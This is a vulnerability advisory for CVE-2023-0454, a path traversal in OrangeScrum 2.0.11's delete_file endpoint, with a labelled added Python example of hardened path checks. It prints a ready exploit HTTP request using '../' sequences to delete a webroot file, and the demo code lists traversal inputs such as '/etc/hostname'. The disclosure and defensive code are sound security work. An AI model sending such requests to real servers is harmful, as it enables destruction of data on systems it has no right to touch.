URL: https://fluidattacks.com/advisories/slushii/



ORANGESCRUM 2.0.11 - ARBITRARY FILE DELETE VIA FILE_NAME


SUMMARY

Name: OrangeScrum 2.0.11 - Arbitrary File Delete via file_name
Code name: Slushii
Product: OrangeScrum
Affected versions: 2.0.11
State: Public
Release Date: 2023-01-30


VULNERABILITY

Kind: Lack of data validation - Path Traversal
Rule: 063. Lack of data validation - Path Traversal
Remote: Yes
CVSSv3 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
CVSSv3 Base Score: 8.1
Exploit available: No
CVE ID(s): CVE-2023-0454


DESCRIPTION

OrangeScrum version 2.0.11 allows an authenticated external attacker to delete
arbitrary local files from the server. This is possible because the application
uses an unsanitized attacker-controlled parameter to construct an internal path.


VULNERABILITY

This vulnerability occurs because the application takes the attacker-controlled
file_name parameter of the delete_file endpoint and joins it onto an internal
path without sanitizing it, so "../" segments walk out of the intended
directory and the delete operates on an arbitrary file the web server user can
remove.
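The following is an added example, not OrangeScrum's code and not part of the
original advisory. It models the class of bug described above with a hypothetical
"delete upload" handler whose file name comes from the client, and shows the
checks a hardened version needs: reject anything that is not a bare file name,
resolve symlinks on both sides, and require the final path to be a child of the
upload root. The directory layout, file names and `UnsafePathError` type are
assumptions constructed for the demonstration.

```python
"""Hardened path handling for a client-addressed 'delete uploaded file' endpoint.

Added example (not OrangeScrum code). The bug class: a user-supplied file name
is joined onto a server-side directory without validation, so '..' segments
escape the intended folder and the delete hits an arbitrary file.
"""
import os
import tempfile
from pathlib import Path


class UnsafePathError(ValueError):
    """Raised when a client-supplied name does not resolve inside the upload root."""


def resolve_upload_path(upload_root: str, file_name: str) -> Path:
    """Map a client-supplied file name to a path strictly inside upload_root.

    Hypothetical policy for this example:
    - reject empty names and embedded NUL bytes
    - reject anything that is not a bare file name (no directory separators, no '..')
    - resolve symlinks on both sides and require the result to be a child of the root
    """
    if not file_name or "\x00" in file_name:
        raise UnsafePathError("empty name or NUL byte")
    # Uploads are addressed by a bare name, never by a path.
    if os.path.basename(file_name) != file_name or file_name in (".", ".."):
        raise UnsafePathError(f"not a bare file name: {file_name!r}")
    root = Path(upload_root).resolve(strict=True)
    candidate = (root / file_name).resolve()
    # Containment check after symlink resolution: the real path must sit under root.
    if root not in candidate.parents:
        raise UnsafePathError(f"escapes upload root: {file_name!r}")
    return candidate


def delete_upload(upload_root: str, file_name: str) -> bool:
    """Delete an upload only if it resolves inside the root. Returns True when a file was removed."""
    target = resolve_upload_path(upload_root, file_name)
    if not target.is_file():
        return False
    target.unlink()
    return True


def demo() -> dict:
    """Exercise the checks against a constructed upload directory and a decoy outside it."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "webroot" / "uploads"
        root.mkdir(parents=True)
        (root / "report.pdf").write_bytes(b"constructed upload")
        decoy = Path(tmp) / "webroot" / "index.php"  # constructed file that must survive
        decoy.write_bytes(b"constructed decoy")
        # A symlink inside the upload directory that points outside it.
        (root / "link").symlink_to(decoy)

        results["legit"] = delete_upload(str(root), "report.pdf")
        for name in ("../index.php", "../../webroot/index.php", "/etc/hostname", "link", "a\x00b"):
            try:
                delete_upload(str(root), name)
                results[name] = "deleted"
            except UnsafePathError:
                results[name] = "rejected"
        results["decoy_intact"] = decoy.exists()
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key!r}: {value}")
```

The basename check alone would already stop the "../" request shown in this
advisory; the containment check after `resolve()` is what also catches symlinks
planted inside the upload directory, which a string filter cannot see.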


EXPLOIT

To exploit this vulnerability, we only need to send the following malicious
request to the server.

POST /projects/delete_file HTTP/1.1
Host: retr02332bughunter.orangescrum.com
Cookie: USER_UNIQ=1515f12e8e8fc20b7a103011dee82b89; USERTYP=2; USERTZ=49; USERSUB_TYPE=0;
User-Agent: Retr02332
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 96
Connection: close

file_name=../../../../../../../../../../../../../var/www/html/orangescrum/app/webroot/hacked.txt



EVIDENCE OF EXPLOITATION


OUR SECURITY POLICY

We have reserved the ID CVE-2023-0454 to refer to this issue from now on.

 * https://fluidattacks.com/advisories/policy/


SYSTEM INFORMATION

 * Version: OrangeScrum 2.0.11

 * Operating System: GNU/Linux


MITIGATION

There is currently no patch available for this vulnerability.


CREDITS

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive
Team.


REFERENCES

Vendor page https://github.com/Orangescrum/orangescrum/


TIMELINE

2023-01-23

Vulnerability discovered.



2023-01-23

Vendor contacted.



2023-01-23

Vendor replied acknowledging the report.



2023-01-30

Public Disclosure.

Copyright © 2023 Fluid Attacks. We hack your software. All rights reserved.